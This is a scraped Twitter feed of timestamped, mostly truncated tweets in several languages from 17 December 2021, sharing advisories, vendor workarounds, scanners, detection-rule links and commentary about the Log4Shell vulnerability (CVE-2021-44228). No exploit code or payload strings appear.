2021-12-17 17:31:12Hackers vs. Developers // CVE-2021-44228 Log4Shell https://t.co/exPWfVTCjC 來自 @YouTube https://youtu.be/w2F67LbEtnkss8651twtw
2021-12-17 17:30:54Workaround instructions to address CVE-2021-44228 in Site Recovery Manager https://t.co/tWj21T2A4t https://dy.si/hwcN6kevinpollock
2021-12-17 17:30:50Workaround instructions to address CVE-2021-44228 and CVE-2021-45046 in vRealize... https://t.co/3FG2xqiss5 https://dy.si/MRppVkevinpollock
2021-12-17 17:23:58#log4j Scanner that detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046, etc) on your file-system wi… https://t.co/FugTlrcgr0 https://twitter.com/i/web/status/1471890664744964108IT_news_for_all
2021-12-17 17:21:41Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround. https://t.co/BzBTivEf55 #log4j… https://t.co/NGJMWrUFwU https://angrysysops.com/2021/12/17/additional-step-for-vcenter-server-cve-2021-44228-and-cve-2021-45046-workaround/ https://twitter.com/i/web/status/1471892292206215174AngrySysOps
2021-12-17 17:20:50How @KrollWire is Handling CVE-2021-44228 (Log4J / Log4Shell) https://t.co/XbsOHTi2ZA https://t.co/G7Lq2DD4b1 https://buff.ly/3DZD0YYleosaraceni
2021-12-17 17:20:37ضهور ثغرة جديدة CVE-2021-44228 كل ماتريد معرفتة عن الثغرة في الصورة #log4j https://t.co/2AdRMd9V88Pro_houthi
2021-12-17 17:12:36#Log4J #Log4Shell: Is Your Network Safe? CVE-2021-44228 is making headlines. @KeysightNAS security expert… https://t.co/cO3TFZWQjM https://twitter.com/i/web/status/1471888192240562188KeysightNAS
2021-12-17 17:11:36With #log4j CVE-2021-44228/45046 running wild, there has never been a better time for #FVEY #hackers to saddle up w… https://t.co/sbYB1AAW11 https://twitter.com/i/web/status/1471889381669720069ryanrutan
2021-12-17 17:01:28Vulnerability scanner and mitigation patch for Log4j2 CVE-2021-44228 by @logpresso. https://t.co/FOIp1ijIGi #infosec #sysadmin #tips https://github.com/logpresso/CVE-2021-44228-Scannerdacbarbos
2021-12-17 17:01:06CVE-2021-44228 aka Log4shell summarized. https://t.co/QTwHPiON5T https://m.youtube.com/watch?v=w2F67LbEtnkcKure7
2021-12-17 16:51:08Am vergangenen Freitag sorgte eine weitere Sicherheitslücke für internationale Schlagzeilen: CVE-2021-44228 oder, w… https://t.co/f2VaIOCQtO https://twitter.com/i/web/status/1471884036251521030stackabletech
2021-12-17 16:40:18Hackers Vs. Developers // CVE-2021-44228 Log4Shell #Hacking #PenTest https://t.co/2zYliAQ2V4 https://t.co/uyfJmsbYwJ https://ift.tt/3sfrvKAhack_videos
2021-12-17 16:40:07#Log4Shell #log4j CVE-2021-44228 @VMware has released a ton of patches for their products. IMO, you should test an… https://t.co/WxuvpqxYWu https://twitter.com/i/web/status/1471882632195620868TomSellers
2021-12-17 16:31:27#Log4Shell #log4j CVE-2021-44228 Friendly reminder: Exploiting Log4Shell against systems you don't control is aski… https://t.co/YLLQO8JMxC https://twitter.com/i/web/status/1471875625736679433TomSellers
2021-12-17 16:31:14@elliotlewis Hi Elliot, thanks for getting in touch! You can find complete details on CVE-2021-44228 at… https://t.co/QCjduTTwhO https://twitter.com/i/web/status/1471876893880328192AskAtlassian
2021-12-17 16:31:05log4j-tools: conjunto de herramientas para encontrar vulnerabilidad log4shell (CVE-2021-44228) en jars y directamen… https://t.co/ml9iPZMNmw https://twitter.com/i/web/status/1471877545712885761elhackernet
2021-12-17 16:30:45Security Bulletin: Vulnerability in Apache Log4j affects IBM Spectrum Protect Plus (CVE-2021-44228) https://t.co/REMAJ9BdXr https://ibm.biz/BdfTP3L2clrogers
2021-12-17 16:30:32Alert: Apache Log4j vulnerability (CVE-2021-44228) - https://t.co/PMqtIMbZCz https://t.co/FhbRfViELq http://NCSC.GOV.UK https://www.ncsc.gov.uk/news/apache-log4j-vulnerabilitycybercavc
2021-12-17 16:25:23If you are mitigating CVE-2021-44228 correctly, then you are mitigating CVE-2021-45046. I don't understand the desi… https://t.co/BynZGwroXi https://twitter.com/i/web/status/1471873202477584394nluedtke1
2021-12-17 16:19:35@likethecoins Gladly. This is a must-read/address info on this particular vCenter 1⃣CVE-2021-44228 - VMSA-2021-002… https://t.co/BrWhKhhSMM https://twitter.com/i/web/status/1471873523371098122VK_Intel
2021-12-17 16:18:26Salt Labs researchers have provided an in-depth analysis about the #Log4Shell (CVE-2021-44228) vulnerability. Find… https://t.co/bUChhOgRfG https://twitter.com/i/web/status/1471873855140638724SaltSecurity
2021-12-17 16:18:02More #Log4Shell madness: Last week CVE-2021-44228 was published. If you patched it, patch it again to move to the… https://t.co/rzPC6sQSQJ https://twitter.com/i/web/status/1471873901709955078shaulir
2021-12-17 16:12:57GitHub - logpresso/CVE-2021-44228-Scanner: Vulnerability scanner and mitigation patch for Log4j2 CVE-2021-44228… https://t.co/QsfDqAac1g https://twitter.com/i/web/status/1471875075678871553StrikStrak
2021-12-17 16:05:44LØST - Kritisk sårbarhed i Apache Log4j - CVE-2021-44228 https://t.co/24RwEnrrZ1 04:52 https://serviceinfo.au.dk/Home/Message/4332ServiceinfoAU
2021-12-17 16:00:48- Log4jのDefault設定は影響を受けない - 2.16.0へのUpgrade等によるJNDI無効化が進んでいる - IPS/WAF等での対応も進んでいる などを考慮すると、リスクはCVE-2021-44228公開当初と… https://t.co/OvJjYiaRYD https://twitter.com/i/web/status/1471872775698923526kterashita
2021-12-17 15:56:25Great reference from UK's NCSC: Alert: Apache Log4j vulnerability (CVE-2021-44228) https://t.co/jva9E3mZzK https://www.ncsc.gov.uk/news/apache-log4j-vulnerabilityanchisesbr
2021-12-17 15:55:46SentinelOne vs Apache Log4j2 (CVE-2021-44228) - Windows https://t.co/2YHgPGjIbI via @YouTube https://youtu.be/z5knUL9rT0Ugarysoopin
2021-12-17 15:52:27#StarWind is immune to #Apache #Log4j2 Vulnerability CVE-2021-44228 (Log4Shell) StarWind Products Are Unaffected!… https://t.co/DaV03o0W4m https://twitter.com/i/web/status/1471865637240778756starwindsan
2021-12-17 15:50:54Yet another product using #log4j and impacted by CVE-2021-44228. It's raining advisories... https://t.co/c7QyXiMXoM https://twitter.com/CERTEU/status/1471859827253121026_saadk
2021-12-17 15:50:15Kritische Schwachstelle in Log4j (CVE-2021-44228) – Was jetzt wichtig ist https://t.co/1pEGsNsRcZ https://www.secure-one.de/cms/kritische-schwachstelle-in-log4j-cve-2021-44228-was-jetzt-wichtig-ist/secure_one
2021-12-17 15:49:51@cybereason releases updated and persistent workaround to prevent exploitation of CVE-2021-44228 and CVE-2021-45046… https://t.co/RLATg2LHlK https://twitter.com/i/web/status/1471866123608023047InakMali
2021-12-17 15:44:41#Cybereason releases updated and persistent workaround to prevent exploitation of CVE-2021-44228 and CVE-2021-45046… https://t.co/jM5UeFVqYz https://twitter.com/i/web/status/1471866785943146502InakMali
2021-12-17 15:41:30[status] Monitoring: Cloudways Engineering and Security teams have analyzed the CVE-2021-44228 (Log4j2) vulnerabili… https://t.co/AU8OVJGcxK https://twitter.com/i/web/status/1471863049166356481Cloudways
2021-12-17 15:33:43#GLPI N’EST PAS affecté par la vulnérabilité CVE-2021-44228 de #Log4j 🟠 Nous tenons à assurer à tous les utilisateu… https://t.co/3CuRNO6Pln https://twitter.com/i/web/status/1471864400638365698GLPI_PROJECT
2021-12-17 15:33:12The Next Wave of # Log4J Attacks Will Be Brutal #log4jshell #vulnerability #cybersec #cybersecurity #CVE-2021-44228 https://t.co/o7GL1xmTfD https://www.wired.com/story/log4j-log4shell-vulnerability-ransomware-second-wave/tariqnaik
2021-12-17 15:22:08Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228) https://t.co/NCWaone5Je https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/TimothyDeBlock
2021-12-17 15:02:30New alert: #Log4Shell (CVE-2021-44228) – what you need to know now! See our summary of what Log4Shell is, how it o… https://t.co/3hSx4TkdI2 https://twitter.com/i/web/status/1471856438687449105KerryMSpringer
2021-12-17 15:01:06@GossiTheDog Emerging Threats have rules for the outbound LDAP connections and "Possible CVE-2021-44228 Payload via… https://t.co/dHKzFhI7Yo https://twitter.com/i/web/status/1471857208484937731m_rothe
2021-12-17 14:53:38Workaround instructions to address CVE-2021-44228 in Site Recovery Manager https://t.co/jen3RZlxhV https://dy.si/MoPSjK2scandaletti
2021-12-17 14:51:02I wonder how many vulnerabilities like #log4j CVE-2021-44228 just chill in npm, pip , composer packages..… https://t.co/EMiE6ladtj https://twitter.com/i/web/status/14718549734240501820fffh
2021-12-17 14:40:24Yet to act against #Log4Shell (CVE-2021-44228)? Start remediation now with this advisory from our #incidentresponse… https://t.co/1CgXISv1fj https://twitter.com/i/web/status/1471852423245406218FSecure_Consult
2021-12-17 14:33:29I've fielded several questions regarding the Log4j2 zero-day vulnerability, aka #Log4Shell, (CVE-2021-44228) this w… https://t.co/Uy1d9nLg0N https://twitter.com/i/web/status/1471847718582722571Yoakum
2021-12-17 14:33:09Attack surface of well-known log4j-CVE-2021-44228 https://t.co/SRcCw17Mpjiamdtruly
2021-12-17 14:32:11#Apache #Log4j2 Vulnerability CVE-2021-44228 (Log4Shell): #StarWind Products Are Unaffected https://t.co/OJHCAuZmJN https://t.co/AIJTJvHHOi https://www.starwindsoftware.com/security/apache_log4j/starwindsan
2021-12-17 14:21:20Ivanti's response to the #Apache #Log4J Vulnerability #CVE-2021-44228. Sign-in for further updates at:… https://t.co/RiW1LBXqkx https://twitter.com/i/web/status/1471846899800059914GoIvanti
2021-12-17 14:20:12IPs exploiting the #log4j2 CVE-2021-44228 detected by the crowdsec community https://t.co/8OLrhfAf9W https://gist.github.com/blotus/f87ed46718bfdc634c9081110d243166rahultyagihacks
2021-12-17 14:12:00Log4shell by the numbers- Why did CVE-2021-44228 set the Internet on Fire? https://t.co/Gcq6HE6q1U. This is a funny… https://t.co/WxaXw1EVWv https://blog.sonatype.com/why-did-log4shell-set-the-internet-on-fire https://twitter.com/i/web/status/1471842779731013642cburma
2021-12-17 14:11:33Apache Log4j Remote Code Execution Vulnerability CVE-2021-44228 - https://t.co/CqQ2QrvywF https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-44228moton
2021-12-17 14:11:02Продолжаем мучать #log4j. ▫️ CVE-2021-44228 была прикрыта в Log4j 2.15.0 путем отключения formatMsgNoLookups опции… https://t.co/Y4BbzxfCAR https://twitter.com/i/web/status/1471844122663215108gebutcher
2021-12-17 14:04:43@marcioalm @cyb3rops I have published Splunk Detection Rules for CVE-2021-44228 and CVE-2021-45046! Thanks for your… https://t.co/O2suZO2iB0 https://twitter.com/i/web/status/1471822331978862597Cystrat_GmbH
2021-12-17 14:01:56Thus far, the log4j vulnerability, tracked as CVE-2021-44228, has been abused by all kinds of threat actors from st… https://t.co/6SdFMVD5fB https://twitter.com/i/web/status/1471837640806780944jbhall56
2021-12-17 14:01:36CVE-2021-44228 (Log4Shell Vulnerability): What you Need to Know... https://t.co/g7NcN7E5Tn https://hubs.ly/Q010YTdf0Security7Net
2021-12-17 14:01:10Apache projects vuln CVE-2021-44228 : https://t.co/tCnV5d8jl5 https://blogs.apache.org/security/entry/cve-2021-44228alexandrejaquet
2021-12-17 14:00:27Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-44228: 4.3M (audience size) CVE-2021-45046: 1.9M CVE-2021-208… https://t.co/LNusEfGEKO https://twitter.com/i/web/status/1471842628228558848CVEtrends
2021-12-17 13:45:57@ToolsWatch @vFeed_IO Log4Shell, CVE-2021-44228, is a CVSS 10.0 and, AFAIK, pretty much always has been. Are you thinking of 45046?TomSellers
2021-12-17 13:44:27Using NSX IDS/IPS to protect against CVE-2021-44228 Log4Shell Vulnerability https://t.co/wPaWvB1Q6I https://dy.si/7LL7iJ2dsimelka
2021-12-17 13:42:17Log4j Airbrake UPDATE: Airbrake patched its log4javabrake2 to fix vulnerabilities associated with CVE-2021-44228… https://t.co/bLCSD3mup6 https://twitter.com/i/web/status/1471836940836257793airbrake
2021-12-17 13:41:09Workaround instructions to address CVE-2021-44228 in Site Recovery Manager https://t.co/5G3LWXoNFq #VMware #log4j2 @VMwareSRM https://angrysysops.com/2021/12/17/workaround-instructions-to-address-cve-2021-44228-in-site-recovery-manager/AngrySysOps
2021-12-17 13:40:48the #log4j #CVE-2021-44228 vulnerabilityNomadAlgerian
2021-12-17 13:38:13The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/6MTjWGkCXT https://twitter.com/i/web/status/1471833366962003976velez1066
2021-12-17 13:37:20SARS-CVE-2021-44228filiptepper
2021-12-17 13:22:12Note that this isn't the Log4Shell vuln which is CVE-2021-44228. I expect that we will see discovery of more vulne… https://t.co/6a79mTOaWi https://twitter.com/i/web/status/1471831211878268931TomSellers
2021-12-17 13:16:44🚨Important🚨 As you may be aware, the Log4j2 zero-day vulnerability (CVE-2021-44228) is affecting many Java-based ap… https://t.co/21A7ssyQPn https://twitter.com/i/web/status/1471827533918195712wso2
2021-12-17 13:15:15Alert: Apache Log4j vulnerability (CVE-2021-44228) https://t.co/efaKKQc7bQ #Log4Shell #log4j #cybersecfutures #cybersecurityfutures #scn https://www.ncsc.gov.uk/news/apache-log4j-vulnerabilityAArabojr
2021-12-17 13:14:18[#BonnesFetesLesAdministrateursSysteme ] Is Your Web Application Exploitable By Log4Shell (CVE-2021-44228) Vulnerab… https://t.co/4b4Tck2bfH https://twitter.com/i/web/status/1471828853052129283icoleis
2021-12-17 13:01:53SAP IdM and recent log4j 2 vulnerabilities (CVE-2021-44228) https://t.co/LyXVotyiGc http://dlvr.it/SFYbYMConsulting_SAP
2021-12-17 13:01:36For anybody struggling with what to do about the #log4j CVE-2021-44228 vulnerability, check out @CISAgov's guidance… https://t.co/jHXplw8C2G https://twitter.com/i/web/status/1471826924108500998wdormann
2021-12-17 12:52:32Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation #UI #security via… https://t.co/K1k4hzZ87p https://twitter.com/i/web/status/1471823781714964482fortivus
2021-12-17 12:45:48Leute, beschäftigt euch mal mit dem Thema "Log4j RCE CVE-2021-44228 vuln" auch wenn ihr persönlich nicht betroffen… https://t.co/ty9Ti3DQ0r https://twitter.com/i/web/status/1471820583981756419TakeoYasha
2021-12-17 12:44:42Workaround instructions to address CVE-2021-44228 and CVE-2021-45046 in vRealize Operations 8.x… https://t.co/Yiohpcd2lz https://twitter.com/i/web/status/1471821238129545221AngrySysOps
2021-12-17 12:43:47I have published in our brand new Github Repo our Current Splunk Detection Rules for the Log4j CVE-2021-44228 and C… https://t.co/ABmlUBleCR https://twitter.com/i/web/status/1471821302138822661Cystrat_GmbH
2021-12-17 12:43:33SAP IdM and recent log4j 2 vulnerabilities (CVE-2021-44228) https://t.co/dPkXnAfiEp https://ift.tt/3J10JeUabap4sap
2021-12-17 12:41:26SCN: SAP IdM and recent log4j 2 vulnerabilities (CVE-2021-44228) https://t.co/7fkYxDZpcd https://ift.tt/3J10JeUsapCommBlogs
2021-12-17 12:25:20Worried that you might be affected by the critical #log4j issue (CVE-2021-44228) announced this week? @SecarmaLabs… https://t.co/PdjtIYK9Qh https://twitter.com/i/web/status/1471815691967811587Secarma
2021-12-17 12:21:38📢 #GLPI is NOT affected by the #Log4j vulnerability CVE-2021-44228! 🟠 We would like to assure all users that #GLPI… https://t.co/Z69ka1DjeO https://twitter.com/i/web/status/1471817021864222722GLPI_PROJECT
2021-12-17 12:11:57Apache Log4j2のRCE脆弱性(CVE-2021-44228)を狙う攻撃観測 https://t.co/dFKWX9LRPH https://blogs.jpcert.or.jp/ja/2021/12/log4j-cve-2021-44228.htmlmoneymog
2021-12-17 12:01:40@furryronin Hi Gareth :) Happy to say we weren't affected by CVE-2021-44228 as we don't use Java or log4j. We keep… https://t.co/8E6pBoQX6D https://twitter.com/i/web/status/1471810159466983428JoinCharlie
2021-12-17 12:01:32@ForecastHQ Just checking, but are any of your services affected by Log4j (Critical vulnerability CVE-2021-44228 A… https://t.co/NYZc6s3rrJ https://twitter.com/i/web/status/1471810320536678402furryronin
2021-12-17 11:51:1812月15日版 Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起 https://t.co/rfs86uLftK https://www.jpcert.or.jp/at/2021/at210050.htmlmabi_foo
2021-12-17 11:50:49@JoinCharlie Just checking, but are any of your services affected by Log4j (Critical vulnerability CVE-2021-44228 A… https://t.co/Z5tfRVF2OJ https://twitter.com/i/web/status/1471808302581534724furryronin
2021-12-17 11:50:38“Apache Log4j における脆弱性(CVE-2021-44228)の対応完了のお知らせ” https://t.co/lZEEqXCmL8 https://htn.to/4w6FxGXnDNlabunix
2021-12-17 11:41:04Vulnérabilité critique détectée dans la bibliothèque #Log4j #Apache – CVE-2021-44228  https://t.co/mNW2qb0cnB https://antivirus-france.com/vulnerabilite-critique-detectee-dans-la-bibliotheque-log4j-apache-cve-2021-44228/antivirusfrance
2021-12-17 11:40:42Download #VMware Unified Access Gateway 2111.1 &lt; includes a fix for the critical CVE-2021-44228 vulnerability… https://t.co/Txsh9vON9P https://twitter.com/i/web/status/1471805399590391820cstalhood
2021-12-17 11:40:39GitHub - CERTCC/CVE-2021-44228_scanner: Scanners for Jar files that may be vulnerable to CVE-2021-44228 https://t.co/aLSPmC42UH https://github.com/CERTCC/CVE-2021-44228_scannernuria_imeq
2021-12-17 11:32:00“NISC 注意喚起、ApacheLog4j の脆弱性(CVE-2021-44228)を悪用する実証コードも公開 | ScanNetSecurity” https://t.co/sP9mlKUSEe https://htn.to/4xySkzUrmmlabunix
2021-12-17 11:31:54“警察庁 注意喚起、Javaライブラリ「Apache Log4j」の脆弱性(CVE-2021-44228)を標的とした攻撃を観測 | ScanNetSecurity” https://t.co/ehsJnR6Hix https://htn.to/4porLyAo6Xlabunix
2021-12-17 11:31:49Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/S6Vqiz5foE https://dy.si/XxSAPazizkadagan
2021-12-17 11:28:23Apache Log4j2のRCE脆弱性(CVE-2021-44228)を狙う攻撃観測 https://t.co/UFB4uSyjF4 https://blogs.jpcert.or.jp/ja/2021/12/log4j-cve-2021-44228.htmlr_o_r_o_r_o_r_o
2021-12-17 11:15:41Log4jTools - Tools for investigating Log4j CVE-2021-44228 https://t.co/d7lGUSLM54 http://github.com/MalwareTech/Log4jToolspythontrending
2021-12-17 11:13:55Krytyczna podatność CVE-2021-44228 w log4j nie dotyczy oprogramowania jProbit, ani PWI. https://t.co/Y3aUvmFwUWProbit_serwis
2021-12-17 11:12:45Notaで提供している各種サービスのApache Log4j に関する脆弱性(CVE-2021-44228)の影響について - Nota Developers' Blog IT企業技術ブログ等アンテナより https://t.co/LISqhJfsT2 https://blog.notainc.com/entry/2021/12/17/193823?utm_source=feedmohritaroh
2021-12-17 11:11:52今週CVE-2021-44228の影響範囲ばっか調べてたせいで、CVEという文字を見るだけで心臓がヒュッってなる おうちに早く帰りたい(._.)st_mouton
2021-12-17 11:11:28SAP IdM and recent log4j 2 vulnerabilities (CVE-2021-44228) https://t.co/JCjg18rbDu #itpfed https://blogs.sap.com/2021/12/17/sap-idm-and-recent-log4j-2-vulnerabilities-cve-2021-44228/?utm_source=dlvr.it&utm_medium=twitteritpfed
2021-12-17 10:59:07Apache Log4j2のRCE脆弱性(CVE-2021-44228)を狙う攻撃観測 https://t.co/Ypzxk51If5 https://blogs.jpcert.or.jp/ja/2021/12/log4j-cve-2021-44228.htmlzephel01
2021-12-17 10:58:49脆弱性の影響が無いことを確認しました / "Notaで提供している各種サービスのApache Log4j に関する脆弱性(CVE-2021-44228)の影響について - Nota Developers' Blog" https://t.co/qySi3R6VaY https://blog.notainc.com/entry/2021/12/17/193823akiroom
2021-12-17 10:56:56“Apache Log4j2のRCE脆弱性(CVE-2021-44228)を狙う攻撃観測 - JPCERT/CC Eyes” https://t.co/j8e0R0Zm27 https://htn.to/2iAVyauM3ywaiha8
2021-12-17 10:55:53GitHub - michaelsanford/Log4Shell-Honeypot: Dockerized honeypot for CVE-2021-44228. https://t.co/tYFxu4gE9p https://github.com/michaelsanford/Log4Shell-HoneypotSecurityblog
2021-12-17 10:51:16GitHub - obscuritylabs/log4shell-poc-lab: A lab demonstration of the log4shell vulnerability: CVE-2021-44228 https://t.co/h4Ssw5g66z https://github.com/obscuritylabs/log4shell-poc-labSecurityblog
2021-12-17 10:32:38“Apache Log4j2のRCE脆弱性(CVE-2021-44228)を狙う攻撃観測 - JPCERT/CC Eyes” https://t.co/LX7fuWfg3A https://htn.to/3dHgyZ3MJhwaiha8
2021-12-17 10:30:36Apache Log4j の脆弱性(CVE-2021-44228)の影響について https://t.co/LMz3MDpdVt http://dlvr.it/SFY8Pplisketjp
2021-12-17 10:21:33The Apache Software Foundation (ASF) has already released a patch for the Log4Shell vulnerability (CVE-2021-44228),… https://t.co/Fct0iwvPIa https://twitter.com/i/web/status/1471785898014654467CyberHues
2021-12-17 10:15:22La grave vulnerabilità dello strumento di registrazione Log4j (CVE-2021-44228), conosciuto come "Log4Shell", sta de… https://t.co/r6dAuJifuG https://twitter.com/i/web/status/1471782596023664642Axis_Italia
2021-12-17 10:13:21CERT/CC has released a Log4Shell scanner #Log4j CVE-2021-44228 CVE-2021-45046 https://t.co/zPPu9MJxoU https://t.co/F3O6De6Gfk https://github.com/CERTCC/CVE-2021-44228_scanner https://twitter.com/campuscodi/status/1471472486432845829?s=21argevise
2021-12-17 10:05:26#Shaarli: December/2021 - CVE-2021-44228: Log4Shell Remote Code Execution Mitigation - HAProxy Technologies… https://t.co/d0kCKliBmT https://twitter.com/i/web/status/1471779795117694978LibrementVotre
2021-12-17 10:04:53More #Log4Shell madness! Last week CVE-2021-44228 was published. If you patched it, patch it again to move to the… https://t.co/i1MCdc8zXb https://twitter.com/i/web/status/1471780235809075200armosec
2021-12-17 10:01:00Official technical brief about Apache Log4j Security Vulnerability (CVE-2021-44228) https://t.co/cDTbgVsdAW https://twitter.com/wlsdm/status/1471781523858853889mfevzikorkutata
2021-12-17 09:52:22Si tienes cPanel con el plugin de Solr, ¡atención! que te podría afectar el Log4j CVE-2021-44228 https://t.co/q8HBV7rvmd https://forums.cpanel.net/threads/log4j-cve-2021-44228-does-it-affect-cpanel.696249/JavierCasares
2021-12-17 09:51:04Suite à la publication de la faille CVE-2021-44228, nos équipes techniques sont mobilisées. Nos infrastructures son… https://t.co/2e2lSKptn1 https://twitter.com/i/web/status/1471779006789959685SafeBrands_Op
2021-12-17 09:42:39Apache Log4j の脆弱性(CVE-2021-44228)に関するご案内 https://t.co/K4vg8aVGir #FossID #TechMatrix https://t.co/RIy9Iteaa9 http://dlvr.it/SFY05KTechMatrix_Se
2021-12-17 09:38:39Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation - Microsoft Security Blog https://t.co/AP5AOPc9W5 https://buff.ly/31Pc8Okthebitstreamer
2021-12-17 09:38:21CISA Log4j (CVE-2021-44228) Vulnerability Guidance: https://t.co/jXZjdJUh0f https://github.com/cisagov/log4j-affected-dbrovabu
2021-12-17 09:38:12SonarQube に含まれる Apache Log4j に任意のコードを実行されるなど複数の問題 (CVE-2021-44228, CVE-2021 [40838] https://t.co/EaZMSjw9Fn #SIDfm #脆弱性情報 https://sid.softek.jp/content/show/40838softek_jp
2021-12-17 09:30:32Log4Shell - Detecting Log4j Vulnerability (CVE-2021-44228) Continued https://t.co/RZxmiywMdt https://bit.ly/3e2lR6hteckert_hamburg
2021-12-17 09:22:48@0xdabbad00 Current Status with AWS and Log4j2 CVE-2021-44228. A sortable Google Sheet is here:… https://t.co/F3AQaGqEOs https://twitter.com/i/web/status/1471770071915806723apple_rom
2021-12-17 09:20:39@impactdotcom Does your products have any countermeasures against CVE-2021-44228?hiroohi
2021-12-17 09:20:29@nv1t @Lefty_4tw @certbund @HonkHase CVE-2021-44228 vs. CVE-2021-45046, letztere gab es vor 4 Tagen noch nicht, denke ich auch.daniel_reineke
2021-12-17 09:20:12urgent note setting out the current situation and advice on a critical cyber vulnerability, CVE-2021-44228, also kn… https://t.co/oDS5YH9WjS https://twitter.com/i/web/status/1471772154912026624KICACare
2021-12-17 09:11:35Log4Shell - Detecting Log4j Vulnerability (CVE-2021-44228) Continued https://t.co/qTa21tsRvO https://bit.ly/3p31VGPMickApMick
2021-12-17 09:01:40🔴APACHE🔴 Múltiples vulnerabilidades de severidad alta en productos APACHE: CVE-2021-4104,CVE-2021-44228 Más info… https://t.co/yjFajBietZ https://twitter.com/i/web/status/1471765871999827970GrupoICA_Ciber
2021-12-17 09:01:26#PlanetLotus blog: Apache Log4j-Sicherheitslücke CVE-2021-44228: Sind HCL Notes, Domino, Sametime, Connections usw.… https://t.co/YtjDFdF1qK https://twitter.com/i/web/status/1471766257053675521domino_robot
2021-12-17 09:00:33Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation: https://t.co/hKp2ls2501 https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/rovabu
2021-12-17 09:00:26JPCERTによるApache Log4j2のRCE脆弱性(CVE-2021-44228)を狙う攻撃観測 #log4j https://t.co/7AlbK3xzCV https://blogs.jpcert.or.jp/ja/2021/12/log4j-cve-2021-44228.htmlt_nihonmatsu
2021-12-17 09:00:18Here's a video of us goofing around with the #Log4J CVE-2021-44228 vulnerability: https://t.co/9nT9vkwGYv Shows M… https://t.co/c2NU7uWzPI https://www.youtube.com/watch?v=CpbgoovWXpY https://twitter.com/i/web/status/1471766777700913153JavaJulius
2021-12-17 08:50:40从零到一带你深入 log4j2 Jndi RCE CVE-2021-44228 漏洞 https://t.co/GCv5HyLmJs https://t.co/q5l7Ctdw9C https://ift.tt/3qn5gjF https://ift.tt/3Eh3F3Pbuaqbot
2021-12-17 08:42:19この1週間のCVE-2021-44228の影響確認で、とりあえずLog4jのcoreを使っているかどうかの確認はできたはずだから、CVE-2021-45046の影響の切り分けはわりとスムースにできるんじゃないかな。知らんけど。cam_i8
2021-12-17 08:41:27@backbase hello, from what I see backbase 5.9 is not vulnerable to #LOG4J CVE-2021-44228 but what about CVE-2019-17571? thnakshpbaxter
2021-12-17 08:31:055 Things We’ve Learned About CVE-2021-44228 https://t.co/CXr1lhXiTG https://ift.tt/3IQMRnHbug_less
2021-12-17 08:30:52The Log4Shell/ Log4j Vulnerability (CVE-2021-44228) Explained https://t.co/F1MDveIPRW https://blogs.blackberry.com/en/2021/12/the-log4shell-log4j-vulnerability-cve-2021-44228-explainedSecnewsbytes
2021-12-17 08:30:33今日1日で何回CVE-2021-44228のやり取りをしたか分からないfujiko_memo
2021-12-17 08:23:23Google Cloud recommendations for investigating and responding to the Apache “Log4j 2” vulnerability (CVE-2021-44228) https://t.co/pzuby9JufU https://cloud.google.com/blog/products/identity-security/recommendations-for-apache-log4j2-vulnerability/5ergio_Cuellar
2021-12-17 08:23:21New solr docker image vet 8.11.1 Updates bundled log4j2 dependencies to address CVE-2021-44228 (SOLR-15843) Upgrad… https://t.co/FNs8sSAzCS https://twitter.com/i/web/status/1471752276175998981simsmbugua
2021-12-17 08:23:12Apache Log4j2のRCE脆弱性(CVE-2021-44228)を狙う攻撃観測 - JPCERT/CC Eyes | JPCERTコーディネーションセンター公式ブログ https://t.co/exL6aYxpXM https://blogs.jpcert.or.jp/ja/2021/12/log4j-cve-2021-44228.htmlohhara_shiojiri
2021-12-17 08:21:16Apache Log4j2のRCE脆弱性(CVE-2021-44228)を狙う攻撃観測(JPCERT/CC Eyes 12月17日) https://t.co/p5RCyydrt9 https://blogs.jpcert.or.jp/ja/2021/12/log4j-cve-2021-44228.htmlJPACofficial
2021-12-17 08:07:16素人だからよく分からんのだけどさぁ、 CVE-2021-44228をlog4jshellで対策する場合ってさぁ、構成管理どうなるの? https://t.co/EtQhRlDQGr https://twitter.com/sec_s_owl/status/1471743731959476224JesusKillist
2021-12-17 08:06:08QRadar: Addendum to Apache Log4j CVE-2021-44228 vulnerability information https://t.co/LgcdCGks00 https://www.ibm.com/support/pages/node/6526712DietgerBahn
2021-12-17 08:04:575 Things We’ve Learned About CVE-2021-44228 https://t.co/fTb6qHCfYg #ImpervaResources https://www.imperva.com/blog/5-things-weve-learned-about-cve-2021-44228/irisharlev
2021-12-17 08:01:28Earlier this week the critical vulnerability CVE-2021-44228 has been found for log4j. Here are comments and recomme… https://t.co/DUJLD6RqcD https://twitter.com/i/web/status/1471750925744328707TechFov
2021-12-17 07:58:23AWS services and Apache Log4j2 Issue CVE-2021-44228 (Update V5 2021/12/16): https://t.co/Du2G2KdSGw The version is… https://t.co/kxp1pI9Giq https://aws.amazon.com/security/security-bulletins/AWS-2021-006/ https://twitter.com/i/web/status/1471747881962983430apple_rom
2021-12-17 07:55:31Enhance your detection of Log4j exploit (CVE-2021-44228) with the YARA App by Gladys Koskas https://t.co/rcSE5qksNO https://community.ibm.com/community/user/security/blogs/gladys-koskas1/2021/12/13/enhance-your-detection-of-log4j-with-yaraDietgerBahn
2021-12-17 07:53:495 Things We’ve Learned About CVE-2021-44228 #infosec #infosecurity #cybersecurity #threatintel #threatintelligence… https://t.co/zpt5ACvTb5 https://twitter.com/i/web/status/1471748999904477190CyberIQs_
2021-12-17 07:52:12Detection of Log4Shell (CVE-2021-44228) using QRadar by Adam Frank https://t.co/iTtQvxpOzI https://community.ibm.com/community/user/security/blogs/adam-frank/2021/12/13/detection-of-log4shell-using-qradar?CommunityKey=f9ea5420-0984-4345-ba7a-d93b4e2d4864&tab=recentcommunityblogsdashboardDietgerBahn
